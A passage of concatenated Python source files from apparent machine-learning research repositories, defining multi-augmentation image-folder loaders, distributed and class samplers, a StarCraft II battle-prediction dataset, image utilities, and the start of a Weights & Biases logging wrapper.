self.test_loader = MultiAugmentDALIClassificationIterator(test_dataset, size=test_dataset.epoch_size("Reader"),
fill_last_batch=True,
last_batch_padded=True,
auto_reset=True,
num_augments=num_augments)
# Build the valid dataset and loader
self.valid_loader = None
if os.path.isdir(os.path.join(path, 'valid')):
valid_dataset = HybridPipeline(data_dir=os.path.join(path, 'valid'),
batch_size=batch_size,
shuffle=True,
device="gpu" if cuda else "cpu",
transforms=valid_transform,
target_transform=valid_target_transform,
rank=rank, num_replicas=num_replicas,
num_augments=num_augments, **val_test_kwargs)
valid_dataset.build()
self.valid_loader = MultiAugmentDALIClassificationIterator(
valid_dataset, size=valid_dataset.epoch_size("Reader") // num_replicas,
fill_last_batch=True,
last_batch_padded=True,
auto_reset=True,
num_augments=num_augments
)
# Set the dataset lengths if they exist.
self.num_train_samples = train_dataset.epoch_size("Reader")
self.num_test_samples = test_dataset.epoch_size("Reader")
self.num_valid_samples = valid_dataset.epoch_size("Reader") \
if self.valid_loader is not None else 0
print("train = {} | test = {} | valid = {}".format(
self.num_train_samples, self.num_test_samples, self.num_valid_samples))
# grab a test sample to get the size
sample = self.train_loader.__iter__().__next__()
self.input_shape = list(sample[0].size()[1:])
print("derived image shape = ", self.input_shape)
# derive the output size using the imagefolder attr
self.loss_type = 'ce' # TODO: try to automagic this later.
self.output_size = train_dataset.output_size
print("derived output size = ", self.output_size)
def set_all_epochs(self, epoch):
"""No-op here as it is handled via the pipeline already."""
pass
def set_epoch(self, epoch, split):
"""No-op here as it is handled via the pipeline already."""
pass
class MultiAugmentDALIClassificationIterator(DALIGenericIterator):
"""Only change is the output map to accommodate multiple augmentations."""
def __init__(self,
pipelines,
size,
auto_reset=False,
fill_last_batch=True,
dynamic_shape=False,
last_batch_padded=False,
num_augments=2):
output_map = ["data{}".format(i) for i in range(num_augments)] + ["label"]
super(MultiAugmentDALIClassificationIterator, self).__init__(pipelines, output_map,
size, auto_reset=auto_reset,
fill_last_batch=fill_last_batch,
dynamic_shape=dynamic_shape,
last_batch_padded=last_batch_padded)
def __next__(self):
"""Override this to return things like pytorch."""
sample = super(MultiAugmentDALIClassificationIterator, self).__next__()
if sample is not None and len(sample) > 0:
if isinstance(sample[0], dict):
images = [sample[0][k] for k in sample[0].keys() if "data" in k]
labels = sample[0]["label"]
else:
labels = sample[-1]
images = sample[0:-1]
for idx in range(len(images)):
images[idx] = images[idx].float() / 255
return [*images, labels.squeeze().long()]
class MultiAugmentDALIImageFolderLoader(DALIImageFolderLoader):
"""Differs from above with num_augments returning multiple copies of the image augmentation."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None, valid_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
valid_transform=None, valid_target_transform=None,
num_augments=2, cuda=True, **kwargs):
super(MultiAugmentDALIImageFolderLoader, self).__init__(
path=path, batch_size=batch_size, num_replicas=num_replicas,
train_sampler=train_sampler, test_sampler=test_sampler, valid_sampler=valid_sampler,
train_transform=train_transform, train_target_transform=train_target_transform,
test_transform=test_transform, test_target_transform=test_target_transform,
valid_transform=valid_transform, valid_target_transform=valid_target_transform,
num_augments=num_augments, # The only difference here is that we set multiple augmentations
cuda=cuda, **kwargs
)
```
#### File: jramapuram/datasets/imagefolder.py
```python
import os
import functools
from torchvision import datasets, transforms
from torchvision.datasets.folder import default_loader
from .abstract_dataset import AbstractLoader
class ImageFolderLoader(AbstractLoader):
"""Simple pytorch image-folder loader."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None, valid_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
valid_transform=None, valid_target_transform=None,
cuda=True, **kwargs):
# Curry the train and test dataset generators.
train_generator = functools.partial(datasets.ImageFolder, root=os.path.join(path, 'train'))
test_generator = functools.partial(datasets.ImageFolder, root=os.path.join(path, 'test'))
valid_generator = None
if os.path.isdir(os.path.join(path, 'valid')):
valid_generator = functools.partial(datasets.ImageFolder, root=os.path.join(path, 'valid'))
super(ImageFolderLoader, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
valid_dataset_generator=valid_generator,
train_sampler=train_sampler,
test_sampler=test_sampler,
valid_sampler=valid_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
valid_transform=valid_transform,
valid_target_transform=valid_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
# grab a test sample to get the size
test_img, _ = self.train_loader.__iter__().__next__()
self.input_shape = list(test_img.size()[1:])
print("derived image shape = ", self.input_shape)
# derive the output size using the imagefolder attr
self.loss_type = 'ce' # TODO: how to incorporate other features?
self.output_size = len(self.train_loader.dataset.classes)
print("derived output size = ", self.output_size)
class MultiAugmentImageDataset(datasets.ImageFolder):
"""Extends imagefolder to simply augment the same image num_augments times."""
def __init__(self, root, transform=None, target_transform=None, non_augmented_transform=None,
loader=default_loader, is_valid_file=None, num_augments=2):
assert num_augments > 1, "Use this dataset when you want >1 augmentations"
self.num_augments = num_augments # Number of times to augment the same image
self.non_augment_transform = non_augmented_transform # transform for non-augmented image (eg: resize)
super(MultiAugmentImageDataset, self).__init__(
root=root, transform=transform, target_transform=target_transform,
loader=default_loader, is_valid_file=is_valid_file)
def __getitem_non_transformed__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (sample, target) where target is class_index of the target class.
"""
path, target = self.samples[index]
sample = self.loader(path)
if self.non_augment_transform is not None:
sample = self.non_augment_transform(sample)
if self.target_transform is not None:
target = self.target_transform(target)
return sample, target
def __getitem__(self, index):
"""Label is the same for index, so just run augmentations again."""
sample0, target = self.__getitem_non_transformed__(index)
samples = [sample0] + [super(MultiAugmentImageDataset, self).__getitem__(index)[0]
for _ in range(self.num_augments)]
return samples + [target]
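# A sketch of what a single sample looks like (root and transforms are
# placeholders): with num_augments=2 each index yields the non-augmented image,
# two augmented views and the label.
#
#   ds = MultiAugmentImageDataset(root='data/train', transform=train_aug,
#                                 non_augmented_transform=resize_only,
#                                 num_augments=2)
#   plain, view_1, view_2, label = ds[0]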
class MultiAugmentImageFolder(AbstractLoader):
"""Runs multiple augmentations PER image and returns."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None, valid_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
valid_transform=None, valid_target_transform=None,
non_augmented_transform=None, # The first image returned is non-augmented, useful for resize, etc.
cuda=True, num_augments=2, **kwargs):
# Curry the train and test dataset generators.
train_generator = functools.partial(MultiAugmentImageDataset,
root=os.path.join(path, 'train'),
non_augmented_transform=self.compose_transforms(non_augmented_transform),
num_augments=num_augments)
test_generator = functools.partial(MultiAugmentImageDataset,
root=os.path.join(path, 'test'),
non_augmented_transform=self.compose_transforms(non_augmented_transform),
num_augments=num_augments)
valid_generator = None
if os.path.isdir(os.path.join(path, 'valid')):
valid_generator = functools.partial(MultiAugmentImageDataset,
root=os.path.join(path, 'valid'),
num_augments=num_augments)
super(MultiAugmentImageFolder, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
valid_dataset_generator=valid_generator,
train_sampler=train_sampler,
test_sampler=test_sampler,
valid_sampler=valid_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
valid_transform=valid_transform,
valid_target_transform=valid_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
# grab a test sample to get the size
train_samples_and_labels = self.train_loader.__iter__().__next__()
self.input_shape = list(train_samples_and_labels[0].size()[1:])
print("derived image shape = ", self.input_shape)
# derive the output size using the imagefolder attr
self.loss_type = 'ce' # TODO: how to incorporate other features?
self.output_size = len(self.train_loader.dataset.classes)
print("derived output size = ", self.output_size)
```
#### File: jramapuram/datasets/samplers.py
```python
import math
import torch
import numpy as np
import torch.distributed as dist
from torch.utils.data.dataset import Subset
from torch.utils.data.sampler import Sampler
import datasets.utils as utils
class FixedRandomSampler(Sampler):
"""Does a SINGLE fixed random transform of the dataset."""
def __init__(self, data_source):
self.data_source = data_source
with utils.temp_seed(1234):
self.fixed_perm = np.random.permutation(len(self.data_source))
def __iter__(self):
return iter(self.fixed_perm)
def __len__(self):
return len(self.data_source)
class ClassSampler(Sampler):
"""Sampler that restricts data loading to a single class of the dataset.
.. note::
Dataset is assumed to be of constant size.
Arguments:
dataset: Dataset used for sampling.
class_number: The class index to filter out.
This can be a list as well to handle
multiple classes.
"""
def __init__(self, class_number, shuffle=True):
assert class_number is not None
self.class_number = class_number
self.shuffle = shuffle
def __call__(self, dataset, class_number=None):
''' helps to recompute indices '''
if class_number is None:
class_number = self.class_number
# if we receive a list, then iterate over this sequentially
if isinstance(class_number, list):
self.indices = []
self.num_samples = 0
for cn in class_number:
indices, num_samples = self._calc_indices(dataset, cn)
self.indices += indices
self.num_samples += num_samples
else:
self.indices, self.num_samples = self._calc_indices(dataset, class_number)
# DEBUG print:
# print("#indices for {} = {} | dataset = {}".format(self.class_number,
# len(self.indices),
# len(self.dataset)))
# set the current dataset as a subset
self.dataset = Subset(dataset, self.indices)
return self.dataset
@staticmethod
def _calc_indices(dataset, class_number):
indices = [i for i, (_, target) in enumerate(dataset) if target == class_number]
return indices, len(indices)
def __iter__(self):
assert hasattr(self, 'indices'), "need to run __call__() on ClassSampler first"
if self.shuffle:
return (self.indices[i] for i in torch.randperm(len(self.indices)))
return (self.indices[i] for i in range(len(self.indices)))
def __len__(self):
return self.num_samples
class GeneralDistributedSampler(Sampler):
"""Sampler that restricts data loading to a subset of the dataset.
Sourced from https://bit.ly/3eq7MP9 to enable padding.
It is especially useful in conjunction with
:class:`torch.nn.parallel.DistributedDataParallel`. In such case, each
process can pass a DistributedSampler instance as a DataLoader sampler,
and load a subset of the original dataset that is exclusive to it.
.. note::
Dataset is assumed to be of constant size.
Arguments:
dataset: Dataset used for sampling.
num_replicas (optional): Number of processes participating in
distributed training.
rank (optional): Rank of the current process within num_replicas.
pad: pad data by replicating samples
"""
def __init__(self, dataset, num_replicas=None, rank=None, shuffle=True, pad=True):
if num_replicas is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
num_replicas = dist.get_world_size()
if rank is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
rank = dist.get_rank()
self.dataset = dataset
self.num_replicas = num_replicas
self.rank = rank
self.pad = pad
self.epoch = 0
self.shuffle = shuffle
if self.pad:
self.num_samples = int(math.ceil(len(self.dataset) * 1.0 / self.num_replicas))
self.total_size = self.num_samples * self.num_replicas
else:
self.num_samples = int(math.ceil((len(self.dataset) - self.rank) * 1.0 / self.num_replicas))
self.total_size = len(self.dataset)
def __iter__(self):
# deterministically shuffle based on epoch
g = torch.Generator()
g.manual_seed(self.epoch)
if self.shuffle:
indices = torch.randperm(len(self.dataset), generator=g).tolist()
else:
indices = list(range(len(self.dataset)))
# add extra samples to make it evenly divisible
if self.pad:
indices += indices[:(self.total_size - len(indices))]
assert len(indices) == self.total_size
# subsample
indices = indices[self.rank:self.total_size:self.num_replicas]
assert len(indices) == self.num_samples
return iter(indices)
def __len__(self):
return self.num_samples
def set_epoch(self, epoch):
self.epoch = epoch
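# A minimal usage sketch (assumes torch.distributed is initialised and that
# world_size, rank, dataset and num_epochs are defined elsewhere):
#
#   sampler = GeneralDistributedSampler(dataset, num_replicas=world_size, rank=rank)
#   loader = torch.utils.data.DataLoader(dataset, batch_size=32, sampler=sampler)
#   for epoch in range(num_epochs):
#       sampler.set_epoch(epoch)  # re-seed the deterministic shuffle each epoch
#       for batch in loader:
#           ...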
```
#### File: jramapuram/datasets/starcraft_predict_battle.py
```python
import os
import functools
import pandas as pd
import numpy as np
import torch
import torchvision.transforms.functional as F
from PIL import Image
from .utils import temp_seed
from .abstract_dataset import AbstractLoader
def pil_loader(path):
# open path as file to avoid ResourceWarning :
# https://github.com/python-pillow/Pillow/issues/835
with open(path, 'rb') as f:
with Image.open(f) as img:
# return img.convert('L')
return img.convert('RGB')
def to_binary(arr):
return arr.dot(2**np.arange(arr.shape[-1])[::-1])
def one_hot_np(num_cols, indices):
num_rows = len(indices)
mat = np.zeros((num_rows, num_cols))
mat[np.arange(num_rows), indices] = 1
return mat
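# For example (illustrative): one_hot_np(3, [0, 2]) returns
#   [[1., 0., 0.],
#    [0., 0., 1.]]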
def one_hot(feature_matrix):
assert len(feature_matrix.shape) == 2
maxes = [feature_matrix[:, i].max() for i in range(feature_matrix.shape[-1])]
column_features = [one_hot_np(max_val+1, col) for max_val, col in zip(maxes, feature_matrix.T)]
stacked = np.concatenate(column_features, -1)
# return to_binary(stacked)
return stacked
def read_classes(csv_name='predictions.csv'):
""" count_fields = ['marine_count',
'marauder_count',
'siegetank_count',
'siegetanksieged_count',
'zergling_present',
'baneling_present',
'hydralisk_present',
'zerg_lost',
'terran_lost']
"""
parsed = pd.read_csv(csv_name)
# classes = np.concatenate([np.expand_dims(parsed[k], 1) for k in count_fields], 1)
# classes = one_hot(classes)
classes = parsed['marine_count'].values.astype(np.int64)
# # filter out the 0 marine elements since it is heavy tailed
# idx = classes > 0
# classes = classes[idx]
# remove the large classes which shouldn't be there
idx2 = classes < 23
classes = classes[idx2]
filenames = {
'relative_path': parsed['relative_img'].values[idx2],
'fullscreen_path': parsed['fullscreen_img'].values[idx2],
'minimap_path': parsed['minimap_img'].values[idx2]
# 'relative_path': parsed['relative_img'].values[idx][idx2],
# 'fullscreen_path': parsed['fullscreen_img'].values[idx][idx2],
# 'minimap_path': parsed['minimap_img'].values[idx][idx2]
}
return classes, filenames
class StarcraftPredictBattleDataset(torch.utils.data.Dataset):
"""Starcraft predict battle dataset."""
def __init__(self, path, split='train', transform=None, aux_transform=None, target_transform=None):
self.split = split
self.path = os.path.expanduser(path)
self.loader = pil_loader
self.transform = transform
self.aux_transform = aux_transform
self.target_transform = target_transform
# hard-coded
# self.output_size = 124
self.output_size = 22 + 1 # 22 marines + 0 case
# load the images-paths and labels
self.labels, self.img_names = read_classes(os.path.join(self.path, "predictions.csv"))
assert len(self.img_names['fullscreen_path']) == len(self.labels)
# determine train-test split
num_test = int(len(self.labels) * 0.2)
num_train = len(self.labels) - num_test
if split == 'train':
self.img_names = {
'relative_path': self.img_names['relative_path'][0:num_train],
'fullscreen_path': self.img_names['fullscreen_path'][0:num_train],
'minimap_path': self.img_names['minimap_path'][0:num_train]
}
self.labels = self.labels[0:num_train]
else:
self.img_names = {
'relative_path': self.img_names['relative_path'][-num_test:],
'fullscreen_path': self.img_names['fullscreen_path'][-num_test:],
'minimap_path': self.img_names['minimap_path'][-num_test:]
}
self.labels = self.labels[-num_test:]
with temp_seed(1234): # Fixed random shuffle of test set
            rnd_perm = np.random.permutation(np.arange(len(self.labels)))
            self.img_names = {key: val[rnd_perm] for key, val in self.img_names.items()}
            self.labels = self.labels[rnd_perm]
print("[{}] {} samples".format(split, len(self.labels)))
def __getitem__(self, index):
target = self.labels[index]
fullscreen = self.loader(os.path.join(self.path, self.img_names['fullscreen_path'][index]))
minimap = self.loader(os.path.join(self.path, self.img_names['minimap_path'][index]))
if self.transform is not None:
minimap = self.transform(minimap)
if self.aux_transform is not None:
            fullscreen = self.aux_transform(fullscreen)
if not isinstance(fullscreen, torch.Tensor):
fullscreen = F.to_tensor(fullscreen)
if self.target_transform is not None:
target = self.target_transform(target)
return [minimap, fullscreen], target
def __len__(self):
return len(self.labels)
def compute_sampler_weighting(path):
    ''' Reads the classes, computes the per-class histogram and returns the
        reciprocal sampling weights (1 / class_count) for the train and test splits '''
classes, _ = read_classes(os.path.join(path, "predictions.csv"))
hist, _ = np.histogram(classes, classes.max()+1)
num_samples = len(classes)
# weights_unbalanced = [hist[i] for i in classes]
# weights = [1.0 - (w / num_samples) for w in weights_unbalanced]
weights = [hist[i] for i in classes]
# compute train - test weighting
num_test = int(num_samples * 0.2)
num_train = num_samples - num_test
weights_train = weights[0:num_train]
weights_test = weights[-num_test:]
# don't need this anymore
del classes # help out the GC a bit
# return reciprocal weights
return [1.0 / np.array(weights_train),
1.0 / np.array(weights_test)]
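# Illustrative example of the weighting above: for class labels [0, 0, 1] the
# histogram is [2, 1], so each sample gets weight 1 / count(its class), i.e.
# [0.5, 0.5, 1.0], before being split into the train / test portions.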
class StarcraftPredictBattleLoader(AbstractLoader):
"""SC2 predict battle loader, there is no validation set."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
cuda=True, output_size=None, **kwargs):
# derive the weighted samplers
assert train_sampler is None, "sc2 loader uses weighted sampler"
assert test_sampler is None, "sc2 loader uses weighted sampler"
weights_train, weights_test = compute_sampler_weighting(path)
train_sampler = torch.utils.data.sampler.WeightedRandomSampler(weights=weights_train,
num_samples=len(weights_train))
test_sampler = torch.utils.data.sampler.WeightedRandomSampler(weights=weights_test,
num_samples=len(weights_test))
# Use the same train_transform for aux_transform
aux_transform = self.compose_transforms(train_transform)
# Curry the train and test dataset generators.
train_generator = functools.partial(StarcraftPredictBattleDataset,
path=path, split='train',
aux_transform=aux_transform)
test_generator = functools.partial(StarcraftPredictBattleDataset,
path=path, split='test')
# use the abstract class to build the loader
super(StarcraftPredictBattleLoader, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
train_sampler=train_sampler,
                                                           test_sampler=test_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
# self.output_size = 124 # fixed
# self.loss_type = 'bce' # fixed
self.output_size = 22 + 1 # fixed
self.loss_type = 'ce' # fixed
print("derived output size = ", self.output_size)
# grab a test sample to get the size
[test_minimap, _], _ = self.train_loader.__iter__().__next__()
self.img_shp = list(test_minimap.size()[1:])
print("derived image shape = ", self.img_shp)
```
#### File: jramapuram/datasets/utils.py
```python
import cv2
import torch
import contextlib
import numpy as np
from typing import Tuple
from copy import deepcopy
from PIL import Image
from torchvision import transforms
import datasets.loader as ldr
from datasets.samplers import ClassSampler, FixedRandomSampler
cv2.setNumThreads(0) # since we use pytorch workers
def resize_lambda(img, size: Tuple[int, int]):
"""converts np image to cv2 and resize."""
if not isinstance(img, (np.float32, np.float64)):
img = np.asarray(img)
if not isinstance(size, tuple):
size = tuple(size)
return cv2.resize(img, size)
def permute_lambda(img, pixel_permutation):
"""Permute pixels using provided pixel_permutation"""
if not isinstance(img, (np.float32, np.float64)):
img = np.asarray(img)
img_orig_shape = img.shape
return Image.fromarray(
img.reshape(-1, 1)[pixel_permutation].reshape(img_orig_shape)
)
class GaussianBlur(object):
"""Gaussian blur implementation; modified from: https://bit.ly/2WcVfWS """
def __init__(self, kernel_size, min=0.1, max=2.0, p=0.5):
self.min = min
self.max = max
self.prob = p
self.kernel_size = int(np.ceil(kernel_size) // 2 * 2 + 1) # creates nearest odd number [cv2 req]
def __call__(self, sample):
sample = np.array(sample)
if np.random.random_sample() > self.prob:
sigma = (self.max - self.min) * np.random.normal() + self.min
sample = cv2.GaussianBlur(sample, (self.kernel_size, self.kernel_size), sigma)
return transforms.ToPILImage()(sample) # back to PIL land
# from https://tinyurl.com/yy3hyz4d
# sets a temporary numpy seed in scoped context
# eg: with temp_seed(1234):
@contextlib.contextmanager
def temp_seed(seed):
state = np.random.get_state()
np.random.seed(seed)
try:
yield
finally:
np.random.set_state(state)
def normalize_images(imgs, mu=None, sigma=None, eps=1e-9):
"""Normalize imgs with provided mu /sigma
or computes them and returns with the normalized
images and tabulated mu / sigma
:param imgs: list of images
:param mu: (optional) provided mean
:param sigma: (optional) provided sigma
:param eps: tolerance
:returns: normalized images
:rtype: type(imgs), [mu, sigma]
"""
if mu is None:
if len(imgs.shape) == 4:
chans = imgs.shape[1]
mu = np.asarray(
[np.mean(imgs[:, i, :, :]) for i in range(chans)]
).reshape(1, -1, 1, 1)
elif len(imgs.shape) == 5: # glimpses
chans = imgs.shape[2]
mu = np.asarray(
[np.mean(imgs[:, :, i, :, :]) for i in range(chans)]
).reshape(1, 1, -1, 1, 1)
sigma = np.asarray(
[np.std(imgs[:, :, i, :, :]) for i in range(chans)]
).reshape(1, 1, -1, 1, 1)
else:
raise Exception("unknown number of dims for normalization")
if sigma is None:
if len(imgs.shape) == 4:
chans = imgs.shape[1]
sigma = np.asarray(
[np.std(imgs[:, i, :, :]) for i in range(chans)]
).reshape(1, -1, 1, 1)
elif len(imgs.shape) == 5: # glimpses
chans = imgs.shape[2]
sigma = np.asarray(
[np.std(imgs[:, :, i, :, :]) for i in range(chans)]
).reshape(1, 1, -1, 1, 1)
else:
raise Exception("unknown number of dims for normalization")
return (imgs - mu) / (sigma + eps), [mu, sigma]
def normalize_train_test_images(train_imgs, test_imgs, eps=1e-9):
''' simple helper to take train and test images
and normalize the test images by the train mu/sigma '''
train_imgs, [mu, sigma] = normalize_images(train_imgs, eps=eps)
return [train_imgs, normalize_images(test_imgs, mu=mu, sigma=sigma, eps=eps)]
def bw_2_rgb_lambda(img):
    """Simple helper to convert black-and-white / grayscale images to RGB."""
if img.mode == "RGB":
return img
return img.convert(mode="RGB")
def binarize(img, block_size: int = 21):
    """Uses adaptive Gaussian thresholding to binarize an image."""
if not isinstance(img, (np.float32, np.float64)):
img = np.asarray(img)
img = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,
cv2.THRESH_BINARY, block_size, 0)
return np.expand_dims(img, -1) if len(img.shape) < 3 else img
def find_max_label(loader):
"""iterate over loader and find the max label size."""
max_label = 0
for _, lbls in loader:
max_seen_lbl = max(lbls)
if max_seen_lbl > max_label:
max_label = max_seen_lbl
return max_label
def label_offset_merger(loaders, batch_size, use_cuda=False):
''' iterate over all the loaders and:
1. finds the max labels
2. increments loader2 with +loader1_max_label
3. build a new loader with all the data [uses simple_merger]'''
# step 1
max_labels_train = [find_max_label(loader.train_loader) for loader in loaders]
max_labels_test = [find_max_label(loader.test_loader) for loader in loaders]
max_labels = np.maximum(max_labels_test, max_labels_train) + 1
for j in range(1, len(max_labels)):
max_labels[j] += max_labels[j - 1]
print('determined offset max_labels: ', max_labels)
max_labels = torch.from_numpy(max_labels.astype(np.int32))
# step 2
def _extract_and_increment(loader, idx):
data_container, lbl_container = [], []
for data, labels in loader: # extract all the data
data_container.append(data)
lbl_container.append(labels)
# handle data concat
if isinstance(data_container[0], torch.Tensor):
data_container = torch.cat(data_container, 0)
        elif isinstance(data_container[0], np.ndarray):
data_container = torch.from_numpy(np.vstack(data_container))
else:
raise Exception("unknown data type")
# handle label concat
if isinstance(lbl_container[0], torch.Tensor):
lbl_container = torch.cat(lbl_container, 0)
        elif isinstance(lbl_container[0], np.ndarray):
lbl_container = torch.from_numpy(np.vstack(lbl_container))
else:
raise Exception("unknown label type")
# do the actual incrementing
lbl_container += max_labels[idx - 1]
dataset = torch.utils.data.TensorDataset(data_container, lbl_container)
kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}
return torch.utils.data.DataLoader(
dataset=dataset,
batch_size=loader.batch_size,
drop_last=True,
shuffle=True,
**kwargs
)
    # recreate the loaders with the incremented labels
for i in range(1, len(max_labels)):
loaders[i].train_loader = _extract_and_increment(loaders[i].train_loader, i)
loaders[i].test_loader = _extract_and_increment(loaders[i].test_loader, i)
loaders[i].output_size = max_labels[i].cpu().item()
# step3: finally merge them with simpleMerger
    return simple_merger(loaders)
def simple_merger(loaders):
"""Merges train and test datasets given a list of loaders."""
print("""\nWARN [simplemerger]: no process in place for handling different classes,
ignore this if you called label_offset_merger\n""")
has_valid = np.all([hasattr(l, 'valid_loader') for l in loaders])
splits = ['train', 'test'] if not has_valid else ['train', 'test', 'valid']
for split in splits:
loaders = sequential_dataset_merger(
loaders, split, fixed_shuffle=(split == 'test')) # fixed shuffle test set
return loaders[-1]
def create_loader(dataset, sampler, batch_size, shuffle,
pin_memory=True, drop_last=True,
num_workers=0, timeout=0, worker_init_fn=None):
"""Given a dataset and a sampler creates a torch dataloader.
A little extra wizardry for ClassSampler.
:param dataset: the dataset to wrap
:param sampler: what sampler to use
:param batch_size: batch size for dataloader
:param shuffle: whether to shuffle or not
:param pin_memory: pin memory to CUDA
:param drop_last: drop the last elems to not have smaller batch size
:param num_workers: >0 if distributed
:param timeout: timeout for collecting batch from worker
:param worker_init_fn: lambda wid: do_something(wid)
:returns: a dataloader
:rtype: torch.utils.data.Dataloader
"""
if isinstance(sampler, ClassSampler):
# our sampler is hacky; just filters dataset
# and nulls itself out for GC
dataset = sampler(dataset)
sampler = None
return torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
drop_last=drop_last,
shuffle=shuffle,
pin_memory=pin_memory,
sampler=sampler,
num_workers=num_workers,
timeout=timeout,
worker_init_fn=worker_init_fn)
def sequential_dataset_merger(loaders, split='test', fixed_shuffle=False):
"""Given a list of loaders, merge their test/train/valid sets in each new loader.
Other splits (split != split) are kept the same.
Eg: [L1, L2, L3] --> [split(L1), split(L1+L2), split(L1+L2+L3)].
:param loaders: list of loaders with .'split'_loader member populated
:param split: dataset split, eg: test, train, valid
:param fixed_shuffle: forces a single FIXED shuffle (useful when merging test sets).
:returns: the list of loaders with the merge completed.
:rtype: list
"""
# Grab the underlying dataset
datasets = [getattr(l, split + "_loader").dataset for l in loaders]
for idx in range(len(datasets)):
current_dataset = deepcopy(datasets[idx]) # copy to create new
for ds in datasets[0:idx]: # add all previous datasets
current_dataset += ds
# Get the current data loader and its sampler
current_loader = getattr(loaders[idx], split + "_loader")
current_sampler = current_loader.sampler
# Handle the sampler and shuffling
is_shuffled = isinstance(current_loader.sampler, torch.utils.data.RandomSampler)
new_sampler = current_sampler
if is_shuffled and not fixed_shuffle: # ds is shuffled, but dont require fixed shuffle
new_sampler = None
elif fixed_shuffle: # require fixed shuffle
new_sampler = FixedRandomSampler(current_dataset)
else:
raise ValueError("Unknown sampler / fixed_shuffle combo.")
# Build the new loader using the existing dataloader
new_dataloader = create_loader(current_dataset,
sampler=new_sampler,
batch_size=current_loader.batch_size,
shuffle=is_shuffled and not fixed_shuffle,
pin_memory=current_loader.pin_memory,
drop_last=current_loader.drop_last,
num_workers=current_loader.num_workers,
timeout=current_loader.timeout,
worker_init_fn=current_loader.worker_init_fn)
setattr(loaders[idx], split + "_loader", new_dataloader)
return loaders
def sequential_test_set_merger(loaders):
"""Given a list of loaders, merge their test sets in each new loader
    while keeping the other sets the same. Syntactic sugar for sequential_dataset_merger.
Eg: [L1, L2, L3] --> [L1, L1+L2(test), L1+L2+L3(test)].
:param loaders: list of loaders with .test_loader member populated
:returns: the list of loaders with the merge completed.
:rtype: list
"""
    return sequential_dataset_merger(loaders, split='test', fixed_shuffle=True)
def data_loader_to_np(data_loader):
""" Use the data-loader to iterate and return np array.
Useful for FID calculations
:param data_loader: the torch dataloader
:returns: numpy array of input images
:rtype: np.array
"""
images_array = []
for img, _ in data_loader:
images_array.append(img)
images_array = np.transpose(np.vstack(images_array), [0, 2, 3, 1])
# convert to uint8
if images_array.max() < 255:
images_array *= 255
assert images_array.shape[-1] == 3 or images_array.shape[-1] == 1
return images_array.astype(np.uint8)
def get_numpy_dataset(task, data_dir, transform, split, cuda=False, workers_per_replica=2):
""" Builds the loader --> get test numpy data and returns.
:param task: the string task to use
:param data_dir: directory for data
:param transform: the transform to use for the dataset
:param split: train, test or valid
:param cuda: bool indiciating cuda or not
:param workers_per_replica: number of dataloading threads
:returns: test numpy array
:rtype: np.array
"""
loader = ldr.get_loader(task=task,
data_dir=data_dir,
batch_size=1,
cuda=cuda, pin_memory=cuda,
train_transform=transform,
test_transform=transform,
valid_transform=transform,
workers_per_replica=workers_per_replica)
# gather the training and test datasets in numpy
if split == 'test':
return data_loader_to_np(loader.test_loader)
elif split == 'train':
return data_loader_to_np(loader.train_loader)
elif split == 'valid':
return data_loader_to_np(loader.valid_loader)
raise ValueError("Unknown split provided to get_numpy_dataset.")
``` |
{
"source": "jramapuram/helpers",
"score": 3
} |
#### File: jramapuram/helpers/wandb_writer.py
```python
import os
import wandb
from tensorboardX.utils import figure_to_image
from tensorboardX.x2num import make_np
from .utils import hash_to_size
class WandBWriter:
"""Simple adaptor for weights & biases logger."""
def __init__(self, env, server, config, model, port=8080, log_folder=None):
self.env = env
self.server = server
self.port = port
server_format_str = 'http://{}:{}'
os.environ['WANDB_BASE_URL'] = server_format_str.format(
server.replace('http://', ''), port)
# Where to save the logs
self.log_folder = os.path.expanduser(os.path.join(log_folder, env))
if self.log_folder is not None and not os.path.isdir(self.log_folder):
os.makedirs(self.log_folder)
# create the wandb object
self.server = wandb.init(
# name=env, id=env,
# id=env,
# id=hash_to_size(env, size=64),
name=hash_to_size(env, size=16),
resume=True,
config=config,
dir=self.log_folder,
)
wandb.watch(model)
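    # A minimal usage sketch (env, server, config and model values are placeholders):
    #   writer = WandBWriter(env='vae-run-01', server='wandb.example.com', port=8080,
    #                        config={'lr': 1e-3}, model=my_model, log_folder='~/logs')
    #   writer.add_scalar('train/loss', 0.42, global_step=epoch)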
    def add_scalar(self, tag, scalar_value, global_step=None):
        """Add scalar data to W&B, logged under the given tag together with the epoch.
Args:
tag (string): Data identifier
scalar_value (float or string/blobname): Value to save
global_step (int): Global step value to record
"""
scalar_dict = {'epoch': global_step, tag: scalar_value}
return self.add_scalars(scalar_dict)
def add_scalars(self, tag_scalar_dict, global_step=None):
"""Adds many scalar data to summary.
Note that this function also keeps logged scalars in memory. In extreme case it explodes your RAM.
Args:
tag_scalar_dict (dict): Key-value pair storing the tag and corresponding values
global_step (int): Global step value to record
Examples::
writer.add_scalars({'xsinx':i*np.sin(i/r),
